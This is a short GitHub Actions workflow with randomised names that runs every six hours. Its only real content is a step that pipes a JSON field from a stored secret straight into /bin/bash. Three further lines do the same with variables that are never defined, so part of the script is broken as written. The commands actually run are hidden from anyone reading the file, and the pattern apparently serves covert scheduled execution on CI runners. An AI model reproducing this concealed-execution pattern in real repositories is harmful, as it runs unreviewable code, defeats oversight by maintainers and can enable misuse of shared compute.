name: nongqizheng3456

on:
  workflow_dispatch:
  schedule:
    - cron: '18 3/6 * * *'
jobs:
  build:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4
      - name: nongqizheng3456
        env:
          bl7: ${{ secrets.bl7 }}
        run: |
          echo $bl7 | jq -r .yo86 | /bin/bash
          echo $rlubj26002 | jq -r .q579 | /bin/bash
          echo $lb091 | jq -r .oexe68220 | /bin/bash
          echo $w83784 | jq -r .zozz033 | /bin/bash

